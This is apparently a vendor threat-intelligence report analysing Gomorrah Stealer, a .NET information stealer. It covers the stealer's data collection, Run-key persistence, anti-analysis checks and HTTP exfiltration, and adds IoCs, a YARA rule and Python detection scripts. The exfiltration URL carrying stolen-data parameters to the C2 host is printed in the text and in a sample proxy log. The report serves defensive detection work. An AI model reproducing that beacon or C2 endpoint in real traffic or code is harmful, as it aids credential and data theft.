Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware

Published On : 2024-09-13

Executive Summary

At Cyfirma, we are dedicated to providing current insights into prevalent threats and the strategies employed by malicious entities targeting both organizations and individuals. This report provides a comprehensive analysis of the Gomorrah Stealer, an information-stealing malware that operates within a malware-as-a-service (MaaS) framework and targets a range of sensitive data on infected systems. The stealer’s primary function is to extract and exfiltrate information, such as passwords, credit card details, and cookies from web browsers and other applications. This report will explore the stealer’s behavior, its methods of data collection and concealment, and the overall impact on affected systems, providing valuable insights into the malware’s functionality and persistence strategies.

Introduction

Gomorrah Stealer is a sophisticated malware designed to exfiltrate sensitive information from compromised systems. It employs various evasion techniques, enumerates installed programs from the Windows registry, and collects additional information from web browsers, VPN clients, cryptocurrency wallets, and configuration files.

For data concealment, the stealer compresses and uploads the collected information to a remote server, and subsequently deletes the local files to obscure its activities. To ensure persistence, it establishes an autorun mechanism that allows it to reactivate after a system reboot. The stealer also integrates anti-analysis measures to detect and terminate processes associated with security analysis or debugging environments. This report explores the stealer’s operational methods, data collection processes, and persistence strategies, offering a comprehensive overview of its impact and functionality.

Key Findings

  • Gomorrah stealer is a potent malware, functioning as a malware-as-a-service (MaaS) tool, designed to covertly exfiltrate a wide range of sensitive data from compromised systems.
  • It targets data from web browsers, cryptocurrency wallets, VPN clients, messaging apps, and FTP client data.
  • This malware is sold through and supported via Telegram.
  • Gomorrah Stealer is written in .NET as IL-only code that the runtime JIT-compiles at execution time, and the analysed sample is protected with .NET Reactor, which hampers static analysis and decompilation.
  • The malware employs anti-analysis measures by frequently checking for debugging or analysis environments.
  • The malware establishes persistence by creating an Autorun registry entry, ensuring it executes automatically after the system reboots.
  • Gomorrah stealer uploads stolen data to a command-and-control server (C2).
  • The stealer compresses the collected data into a zip archive before uploading it to a remote server and deletes local files post-upload to hide its activities.
  • It sends and receives updates and instructions from the C2 server.

ETLM Attribution

Gomorrah stealer is being sold on a Telegram channel which had 834 subscribers at the time of writing.

Telegram channel

In an old post, the threat actor mentions a website as the official website for the Gomorrah stealer:

Telegram post

https[:]//www[.]Gomorrah[.]pw was down at the time of writing, but the archived page shows the snippet of the website:

Archive page: Gomorrah[.]pw

The C2 identified in this study also reveals the login panel for its subscribers:

C2 login panel: https[:]//rougecommunications[.]org/webpanel/Panel/login[.]php

A recent change in the login panel captured by the CYFIRMA research team suggests that the malware may be renamed, or that new versions will be called “Lucifer”:

Change in the login panel

‘Lucifer’ was used by the threat actor as the malware name for the very first version released:

Telegram post: versions

An announcement has been made by the threat actor on their Telegram page about the upcoming version of the Gomorrah stealer (v5.5):

Telegram post: update announcement

The threat actor also has other social media pages to promote it, such as YouTube and Facebook:

YouTube channel

Facebook page

As per an older Telegram post, the threat actor's handle is ‘Lucifer’, the same name used for the early malware versions. The same name appears on the Facebook page.

A Telegram post: Lucifer

Threat Landscape:
Gomorrah Stealer has emerged in a rapidly evolving and increasingly crowded infostealer market. The sample is IL-only .NET protected with .NET Reactor, which raises the cost of static analysis, and the threat actor has already announced an upcoming version with updated features, indicating ongoing development and refinement. This adaptability underlines the need for behaviour-based detection and continuous review of defenses rather than reliance on file hashes alone.

Analysis of Gomorrah Stealer

File Analysis
File Name: update_windows10.exe
File Size: 550.55 KB (563760 bytes)
Signed: Not signed
MD5: e02089570b24b11d6350337069b7e823
SHA-256: 2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4
Compile timestamp: 01-07-2023

The primary specimen of the Gomorrah stealer is a 32-bit .NET executable protected with .NET Reactor, a commercial obfuscator that renames symbols and can encrypt method bodies, which is what actually hinders decompilation of this sample. Its manifest requests administrator privileges for execution:

The specimen is IL-only .NET code: it contains no native code, only Intermediate Language that the .NET runtime JIT-compiles to native code at execution time. The single entry in the import address table (IAT), ‘_CorExeMain’ from mscoree.dll, is the standard bootstrap stub present in every managed executable and simply hands control to the CLR:

Import table

As a consequence, native-focused static triage (import analysis, native disassembly) reveals almost nothing about the sample. The IL itself is readily recoverable with a .NET decompiler such as dnSpy or ILSpy, so the practical obstacle to static analysis is the .NET Reactor protection rather than the IL/JIT model as such.

This executable consists of four sections, with the .text section comprising 96.90% of the file. The .text section embeds two further executable files:

.text section

We extracted the executable files from the .text section, with the following details:

1. Newtonsoft.Json.dll
File Size: 382.35 KB
MD5: 201fb3d8b93205488e1a6a408ce18539
SHA256: 62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1

2. Zip.exe
File Size: 30.85 KB
MD5: b479fa60615c730d0417b67c1a26274f
SHA256: dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c

Both extracted files are .NET assemblies and neither is flagged by security vendors. For Newtonsoft.Json.dll that is expected, since it is a legitimate library; Zip.exe is a small helper whose only job is compression, so it carries no obviously malicious code on its own.

The overlay section of the specimen contains the URL “http[:]//rougecommunications[.]org/webpanel”:

Overlay data

Behavioral & Code Analysis

1st Stage Execution:
Initially, the .NET runtime takes over: the _CorExeMain stub loads the Common Language Runtime (CLR), which initializes the execution environment, loads the referenced assemblies and JIT-compiles the entry point.

After initialization, WinHttpOpen is called to initialize a WinHTTP session, and the sample looks up the host's public IP address details over the network (visible in the trace as Winsock send() calls). The country code returned by this lookup is reused later for the staging-folder name:

Getting IP details

2nd Stage Execution:
At the second stage, the executable drops the DLL file “Newtonsoft.Json.dll” into the Temp directory of the current user (C:\Users\user\AppData\Local\Temp):

Dropping DLL

This is the file we extracted from the .text section, but the dropped copy's hash differs: the relocation section varies (typically a sign that the copies were linked with different base addresses), as does the overlay, which carries the Authenticode signature. A second copy of the DLL is also dropped into the current working directory, for example the Desktop. Because the library is legitimate and the dropped hash does not match the embedded one, the Newtonsoft.Json.dll hashes are weak indicators on their own.

The dropped DLL, Newtonsoft.Json.dll, is Json.NET, the widely used open-source JSON library published by Newtonsoft (James Newton-King), not a Microsoft component. It ships inside a great many legitimate .NET applications, which is why its presence alone is not suspicious.

Then the executable moves itself from the current working directory (such as the Desktop) to the Temp directory (C:\Users\user\AppData\Local\Temp) while the process continues running.

This works because a running process does not depend on the path of its image file: Windows keeps the image mapped through an open section, and renaming or moving the file within the same volume only changes the directory entry. Deleting the image of a running process is normally refused with a sharing violation, which is why the stealer moves rather than deletes itself at this point.

Moving/renaming malware executable

It also renames itself with a six-digit suffix in the form update_YYDDHH, which we read as the two-digit year, the day of the month and the hour. Under that reading the sample name update_240910 corresponds to the year 2024, day 09 and hour 10. The same string is equally consistent with a YYMMDD layout for 10 September 2024, the period of this analysis, so the exact layout should be treated as unconfirmed; hunting logic should match the update_ prefix followed by six digits rather than decode the digits.

3rd Stage Execution:
The specimen creates a staging directory under the user's Temp directory (C:\Users\user\AppData\Local\Temp). Its name combines the country code obtained from the IP lookup with a host identifier; in this run it was IN_1F8BFBFF000806C1, and GetSystemTimeAsFileTime is called at this point, which suggests a time-derived component. Note, however, that the 16-hex-digit suffix has exactly the layout of the WMI Win32_Processor.ProcessorId string (CPUID EDX feature flags followed by the EAX processor signature; 000806C1 is a Tiger Lake signature), so the identifier appears to be hardware-derived and stable per host. Treat that as an inference; for hunting, match the shape <two uppercase letters>_<16 hex digits> rather than a specific value:

Creating directory

It also creates subdirectories with names such as Browser and Files, where the stealer collects data from the compromised host:

Creating subdirectory

Creating subdirectory

4th Stage Execution: (Data Collection)
The stealer starts harvesting data from the host. It begins by enumerating installed programs from the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall registry key. Since it is a 32-bit process, on 64-bit Windows the registry redirector serves it the WOW6432Node view of that key unless it explicitly opens the 64-bit view, so the resulting list can omit 64-bit-only applications:

Reading installed program via uninstall registry

It writes the gathered details about the installed programs (program name, install date and version) to the ProgramList.txt file in the IN_1F8BFBFF000806C1 staging folder:

Logging gathered data

It then logs the list of running processes to the ProsessList.txt file (the misspelling is the threat actor's own, which makes the file name a handy indicator):

Logging gathered data

The stealer then enumerates browser data by probing the file attributes of the known profile paths of each supported browser, and collects login credentials, passwords, and cookies from those it finds:

Enumerating system for browser data

The stealer also reads the key that protects stored passwords (for example Firefox's) and writes the decrypted entries to its log:

Reading encryption key from Firefox

Logs decrypted data

It also collects data from other programs, such as VPNs, and cryptocurrency wallets:

Logging gathered data

The stealer also collects .ini files to gather a range of sensitive information, such as configuration settings, authentication details, and license keys:

Gathering .ini files

The system information such as PC name, processor, operating system version, antivirus, and firewall, is also collected by the stealer in the info.txt file:

Logging system information

Additionally, it takes screenshots and saves them as Screenshot.png in the IN_1F8BFBFF000806C1 folder:

Taking screenshots

Next, it drops zip.exe in the Temp folder. This is the second file embedded in the .text section; as with the DLL, the dropped copy's hash differs from the embedded one because of variations in the relocation section, which is why two hash pairs for Zip.exe appear in the IoC table:

Dropping zip.exe in the Temp folder

Zip.exe is executed as the child process of the stealer:

Executing zip.exe

Zip.exe repeats the IP lookup for the host, loads clrcompression.dll (the native zlib library that backs System.IO.Compression in the .NET Framework), and compresses the IN_1F8BFBFF000806C1 folder into a zip archive:

Creating zip archive
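The staging layout described across the stages above (the renamed update_ executable, the dropped helpers, the <country>_<hwid> folder with its fixed file names, and the final archive) is enough for a host-side sweep. The following Python is an added example, not code from this report or from the malware: it classifies paths under a Temp folder by those naming conventions and runs on a constructed path listing so it works offline. It assumes only the shape of the names (two uppercase letters, an underscore and sixteen hex digits; update_ followed by six digits), not any specific identifier.

```python
"""Sweep for the %TEMP% artifacts Gomorrah Stealer leaves behind.

Added example (not code from the report or the malware). It runs on a
constructed path listing so it works offline; on a real host, feed it a
recursive listing of %LOCALAPPDATA%\\Temp instead.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, Iterable, Optional

# Naming conventions described in the report. Only the shape is matched:
# the staging folder is <two-letter country code>_<16 hex digits> and the
# relocated executable is update_<six digits> (the date layout of the six
# digits is not confirmed, so it is deliberately not decoded here).
STAGING_DIR = re.compile(r"^[A-Z]{2}_[0-9A-F]{16}$")
STAGING_ZIP = re.compile(r"^[A-Z]{2}_[0-9A-F]{16}\.zip$", re.IGNORECASE)
RENAMED_EXE = re.compile(r"^update_\d{6}(\.exe)?$", re.IGNORECASE)

# Fixed file and folder names inside the staging folder. ProsessList.txt
# keeps the actor's typo, which makes it a high-confidence indicator.
STAGING_FILES = {"programlist.txt", "prosesslist.txt", "info.txt", "screenshot.png"}
STAGING_SUBDIRS = {"browser", "files"}
# Helper binaries dropped next to the relocated stealer (low confidence on
# their own: Newtonsoft.Json.dll is a legitimate library).
DROPPED_HELPERS = {"newtonsoft.json.dll", "zip.exe"}


def classify(path: str) -> Optional[str]:
    """Return an indicator label for a path under a Temp folder, or None."""
    p = PureWindowsPath(path)
    if "temp" not in (part.lower() for part in p.parts):
        return None
    name, parent = p.name, p.parent.name
    if STAGING_DIR.match(parent):
        if name.lower() in STAGING_FILES:
            return f"staging-file:{name}"
        if name.lower() in STAGING_SUBDIRS:
            return f"staging-subdir:{name}"
    if STAGING_DIR.match(name):
        return f"staging-dir:{name}"
    if STAGING_ZIP.match(name):
        return f"staging-archive:{name}"
    if RENAMED_EXE.match(name):
        return f"relocated-exe:{name}"
    if name.lower() in DROPPED_HELPERS:
        return f"dropped-helper:{name}"
    return None


def triage(paths: Iterable[str]) -> Dict[str, str]:
    """Map each suspicious path to its label; unrelated paths are dropped."""
    hits: Dict[str, str] = {}
    for path in paths:
        label = classify(path)
        if label:
            hits[path] = label
    return hits


# Constructed sample listing (not from the report's sandbox run).
SAMPLE_PATHS = [
    r"C:\Users\user\AppData\Local\Temp\update_240910.exe",
    r"C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll",
    r"C:\Users\user\AppData\Local\Temp\zip.exe",
    r"C:\Users\user\AppData\Local\Temp\IN_1F8BFBFF000806C1",
    r"C:\Users\user\AppData\Local\Temp\IN_1F8BFBFF000806C1\Browser",
    r"C:\Users\user\AppData\Local\Temp\IN_1F8BFBFF000806C1\ProsessList.txt",
    r"C:\Users\user\AppData\Local\Temp\IN_1F8BFBFF000806C1.zip",
    r"C:\Users\user\AppData\Local\Temp\tmp1234.tmp",
    r"C:\Program Files\Vendor\Newtonsoft.Json.dll",  # legitimate copy outside Temp
]

if __name__ == "__main__":
    for path, label in triage(SAMPLE_PATHS).items():
        print(f"{label:45} {path}")
```

The staging-folder, archive and ProsessList.txt hits are the ones worth alerting on; a lone Newtonsoft.Json.dll or zip.exe in Temp is common enough (installers extract there) that it should only raise the score of the other findings.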

The following applications and services are targeted by the Gomorrah stealer:

  • Web Browsers: Opera, Edge, Mozilla Firefox, Google Chrome, Chromium, Yandex, Iridium, Epic, Sputnik, 7star, CentBrowser, Orbitum, Kometa, Torch, Amigo, Vivaldi, Chedot, Comodo Dragon, CocCoc Browser, Element Browser, Uran.
  • Cryptocurrency & Wallets: Bitcoin, Armory, Electrum, Ethereum, Zcash, Dash, Monero.
  • VPNs: Proton VPN, OpenVPN.
  • Email/Messaging: Outlook.
  • FTP/File Management: FileZilla.

Exfiltration:

The malware process (update_windows10.exe) reads the compressed archive IN_1F8BFBFF000806C1.zip and builds the upload URI:

Reading zip archive

During this step an unhandled exception was raised with the message “the URI format could not be determined”. This is the message of .NET's System.UriFormatException, most often thrown when a URI string is parsed without a scheme, so it most likely reflects a defect in the stealer's own URI handling rather than an anti-analysis reaction. The exfiltration request was nevertheless observed:

The stealer connects to the C2 server rougecommunications[.]org, reports the categories of data collected (passwords, credit card data, cookies, autofill entries and wallets) through the query string of the URL below, and uploads the compressed archive:

Data exfiltration URL:
http[:]//rougecommunications[.]org/webpanel//logs.php?hwid=IN1F8BFBFF000806C1&Passwords=*&CreditCards=*&Cookies=*&AutoFill=*&Wallets=*

Two details of this request are useful for detection: the doubled slash in /webpanel//logs.php results from concatenating the “/webpanel” base URL stored in the overlay with a path beginning “/logs.php”, and the hwid value is the staging-folder name with its underscore removed, so it starts with the two-letter country code.
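A proxy or egress log is the natural place to catch this request. The following Python is an added example, not part of this report: it matches on the behavioural shape of the beacon (a path ending in logs.php carrying the full hwid/Passwords/CreditCards/Cookies/AutoFill/Wallets key set) rather than on the domain alone, so a rebranded panel on a new host is still caught, and reports separately whether the host is a known C2. The “timestamp client method url status” log layout and the sample lines are constructed for the example.

```python
"""Spot Gomorrah Stealer exfiltration beacons in a web-proxy log.

Added example, not part of the report. The log layout
"timestamp client method url status" and the sample lines are constructed
for the example; adapt the splitter to your proxy's format.
"""
from typing import Dict, Iterable, Iterator, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Query keys seen in the observed logs.php request. The hwid value is the
# staging-folder name without its underscore, so its first two characters
# are the country code obtained from the stealer's IP lookup.
EXFIL_KEYS = {"hwid", "Passwords", "CreditCards", "Cookies", "AutoFill", "Wallets"}
KNOWN_C2 = ("rougecommunications.org",)


def match_exfil(url: str) -> Optional[Tuple[str, str]]:
    """Return (hwid, country) if the URL has the shape of the beacon, else None.

    The test is behavioural (path ending in logs.php plus the complete key set),
    so the same beacon aimed at another host still matches; whether the host
    is a known C2 is reported separately by the caller.
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith("logs.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if not EXFIL_KEYS.issubset(query):
        return None
    hwid = query["hwid"][0]
    return hwid, hwid[:2]


def scan_proxy_log(lines: Iterable[str]) -> Iterator[Dict[str, object]]:
    """Yield one finding per log line whose URL matches the beacon."""
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line: skip it rather than abort the sweep
        timestamp, client, _method, url = fields[:4]
        hit = match_exfil(url)
        if hit is None:
            continue
        hwid, country = hit
        path = urlsplit(url).path
        host = urlsplit(url).hostname or ""
        yield {
            "time": timestamp,
            "client": client,
            "host": host,
            "hwid": hwid,
            "country": country,
            "known_c2": host in KNOWN_C2,
            # the doubled slash is a by-product of the stealer's URL building
            "double_slash": "//logs.php" in path,
        }


# Constructed log lines, not captured traffic. The first reproduces the shape
# of the observed request; the third imitates the same beacon on an unknown host.
SAMPLE_LOG = [
    "2024-09-10T09:12:01Z 10.0.0.15 GET http://rougecommunications.org/webpanel//logs.php?hwid=IN1F8BFBFF000806C1&Passwords=*&CreditCards=*&Cookies=*&AutoFill=*&Wallets=* 200",
    "2024-09-10T09:12:05Z 10.0.0.15 GET http://example.com/index.php?id=3 200",
    "2024-09-10T09:13:40Z 10.0.0.22 GET http://203.0.113.7/panel/logs.php?hwid=DE0123456789ABCDEF&Passwords=*&CreditCards=*&Cookies=*&AutoFill=*&Wallets=* 200",
]

if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
```

The known_c2 flag separates a confirmed hit from a behavioural one, and the hwid lets the client IP be tied to the staging-folder name found during host triage, so the two pieces of evidence corroborate each other.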

After uploading the data to the C2, it deletes the staged files, the dropped helper executables and the archive, leaving little on disk for post-incident review:

Deleting harvested data

Persistence:

For persistence, the Gomorrah stealer adds a value named “Windows Defender Updater” under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (a per-user Run key, so this step needs no elevation), which relaunches the malware when the user next logs on, including after a system reboot:

Persistence using the Windows registry

Anti-Analysis:

Gomorrah stealer repeatedly calls APIs such as GetTickCount and GetSystemInfo and terminates its own process if the results suggest an analysis environment or an attached debugger. GetTickCount is typically used for timing checks (a large gap between two readings around a code region indicates single-stepping or a slowed sandbox), while GetSystemInfo exposes the processor count and other hardware parameters that are often atypically low in sandboxes:

It also calls IsProcessorFeaturePresent, using the reported CPU features as a further signal of a virtualized host:

Gomorrah-Stealer Capabilities

Analyzing the Gomorrah stealer offers important insights into its operational features. Based on this analysis, the following points highlight the capabilities of this information-stealing malware:

  1. Targets and steals a wide range of sensitive information, including web browser data, cryptocurrency wallet details, VPN client information, Outlook data, and FTP client data.
  2. Collects configuration settings, authentication information, and license keys from .ini files.
  3. Captures system information, such as PC name, processor details, operating system version, antivirus, and firewall settings, and takes a screenshot of the desktop.
  4. Creates a Run-key registry entry to ensure automatic execution when the user logs on again after a reboot.
  5. Creates and manages a staging directory in the TEMP folder to store and organize harvested data, relocates and renames its own executable into the same folder, and drops helper binaries (Newtonsoft.Json.dll, zip.exe).
  6. Detects debuggers and analysis environments through timing and hardware checks.
  7. Ships as .NET Reactor-protected, IL-only .NET code, which hampers static analysis.
  8. Compresses the staged data with the dropped zip.exe, exfiltrates the archive to the C2 server over HTTP, and deletes the local files afterwards.
  9. Sends and receives updates and instructions from the C2 server.

Conclusion

The examination of the Gomorrah stealer reveals a versatile information-stealing malware operated as a MaaS tool. Its .NET Reactor-protected, IL-only build raises the cost of static analysis, while its persistence (a per-user Run-key value) and self-relocation into the Temp folder help it survive reboots and casual cleanup. The breadth of data it collects, from browsers, cryptocurrency wallets, VPN and FTP clients, .ini configuration files and system details to screenshots, together with its deletion of staged files after upload, illustrates its potential impact and the importance of capturing evidence before the malware removes it.

Furthermore, Gomorrah Stealer’s distribution as MaaS through the Telegram channel highlights the commercial aspect of modern cyber threats, making sophisticated malware accessible to a wider audience. The threat actor’s announcement of an updated version with new features underscores the ongoing development and enhancement of the stealer, emphasizing the need for continuous vigilance in the face of evolving threats.

As threats like Gomorrah stealer continue to evolve, it is important for organizations to implement robust cybersecurity measures and proactive defense strategies to mitigate the associated risks. To reduce the threat of the Gomorrah stealer, users should exercise caution when opening files from untrusted sources or clicking on unfamiliar links, especially those promoting dubious software or content. Additionally, deploying strong cybersecurity practices – such as using reputable antivirus software, keeping all software up to date, and remaining vigilant against social engineering attacks – can significantly enhance protection against such sophisticated malware.

Indicators Of Compromise

S/N Indicator Type Context
1 e02089570b24b11d6350337069b7e823 MD5 update_windows10.exe (primary specimen)
2 2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4 SHA-256 update_windows10.exe (primary specimen)
3 201fb3d8b93205488e1a6a408ce18539 MD5 Newtonsoft.Json.dll (embedded copy; legitimate library, low confidence on its own)
4 62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1 SHA-256 Newtonsoft.Json.dll (embedded copy; legitimate library, low confidence on its own)
5 b479fa60615c730d0417b67c1a26274f MD5 Zip.exe (embedded copy)
6 dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c SHA-256 Zip.exe (embedded copy)
7 3afd64484a2a34fc34d1155747dd3847 MD5 Zip.exe (second copy; the dropped file differs from the embedded one in its relocation section)
8 bf78263914c6d3f84f825504536338fadd15868d788bf30d30613ca27abeb7a9 SHA-256 Zip.exe (second copy; the dropped file differs from the embedded one in its relocation section)
9 rougecommunications[.]org Domain C2
10 172[.]93[.]223[.]99 IP address C2
11 http[:]//rougecommunications[.]org/webpanel//logs.php URL C2 exfiltration endpoint
12 HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Updater Registry value Persistence

MITRE ATT&CK Tactics and Techniques

No. Tactic Technique
1 Execution (TA0002) T1204.002: User Execution: Malicious File
2 Persistence (TA0003) T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
3 Defense Evasion (TA0005) T1622: Debugger Evasion
T1497: Virtualization/Sandbox Evasion
T1140: Deobfuscate/Decode Files or Information
T1036.005: Masquerading: Match Legitimate Name or Location
T1070.004: Indicator Removal: File Deletion
4 Credential Access (TA0006) T1555.003: Credentials from Password Stores: Credentials from Web Browsers
5 Discovery (TA0007) T1622: Debugger Evasion
T1497: Virtualization/Sandbox Evasion
T1083: File and Directory Discovery
T1082: System Information Discovery
T1057: Process Discovery
T1012: Query Registry
T1518.001: Software Discovery: Security Software Discovery
T1614: System Location Discovery
6 Collection (TA0009) T1005: Data from Local System
T1113: Screen Capture
T1074.001: Data Staged: Local Data Staging
T1560: Archive Collected Data
7 Command and Control (TA0011) T1071.001: Application Layer Protocol: Web Protocols
8 Exfiltration (TA0010) T1041: Exfiltration Over C2 Channel

YARA Rules

The rule identifies known samples by file hash and, independently, by the C2 domain or the pair of strings that make up the Run-key persistence. Hashes are compared through YARA's hash module, since a hash is a property of the file rather than text contained in it, and the strings are matched as both ASCII and UTF-16 because .NET string literals are stored as UTF-16:

    import "hash"

    rule Gomorrah_Stealer_Detection
    {
        meta:
            description = "Detects Gomorrah stealer based on known IoCs"
            author = "Cyfirma Research"

        strings:
            // .NET string literals are UTF-16, so match both encodings
            $domain   = "rougecommunications.org" ascii wide
            // The HKCU prefix never appears in the binary; the API takes the subkey path
            $run_key  = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide nocase
            $run_name = "Windows Defender Updater" ascii wide

        condition:
            // Known sample hashes (the second MD5/SHA-256 pair is the embedded
            // Newtonsoft.Json.dll, a legitimate library, so it is low confidence)
            hash.md5(0, filesize) == "e02089570b24b11d6350337069b7e823" or
            hash.md5(0, filesize) == "201fb3d8b93205488e1a6a408ce18539" or
            hash.md5(0, filesize) == "b479fa60615c730d0417b67c1a26274f" or
            hash.md5(0, filesize) == "3afd64484a2a34fc34d1155747dd3847" or
            hash.sha256(0, filesize) == "2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4" or
            hash.sha256(0, filesize) == "62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1" or
            hash.sha256(0, filesize) == "dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c" or
            hash.sha256(0, filesize) == "bf78263914c6d3f84f825504536338fadd15868d788bf30d30613ca27abeb7a9" or
            // Behavioural strings: the C2 domain, or the Run-key path together with the value name
            $domain or ($run_key and $run_name)
    }

Recommendations

  • Implement threat intelligence to proactively counter the threats associated with the Gomorrah stealer.
  • To protect endpoints, deploy endpoint security that monitors behaviour in real time (an antimalware suite, EDR and a host-based intrusion prevention system), paying attention to executables launched from %TEMP%, binaries that rename themselves, and new values under the HKCU Run key.
  • Monitor network activity with NIDS/NIPS and an egress proxy. The C2 traffic observed here is plain HTTP to /webpanel//logs.php, so URL and query-string inspection at the proxy catches the exfiltration even if the C2 domain changes; blocking the known domain and IP address alone is not sufficient.
  • Configure firewalls to block outbound communication to known malicious IP addresses and domains associated with the Gomorrah stealer command and control servers.
  • Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
  • Employ application whitelisting to allow only approved applications to run on endpoints, preventing the execution of unauthorized or malicious executables.
  • Conduct vulnerability assessments and penetration tests periodically to find and remediate weaknesses that could be used to deliver the stealer.
  • The use of security benchmarks to create baseline security procedures and organizational security policies is also recommended.
  • Develop a comprehensive incident response plan that outlines steps to take in case of a malware infection, including isolating affected systems and notifying relevant stakeholders.
  • Security awareness and training programs help protect from security incidents, such as social engineering attacks. Organizations should remain vigilant and continuously adapt their defenses to mitigate the evolving threats posed by the Gomorrah stealer malware.
  • Apply security patches promptly to reduce the risk of compromise.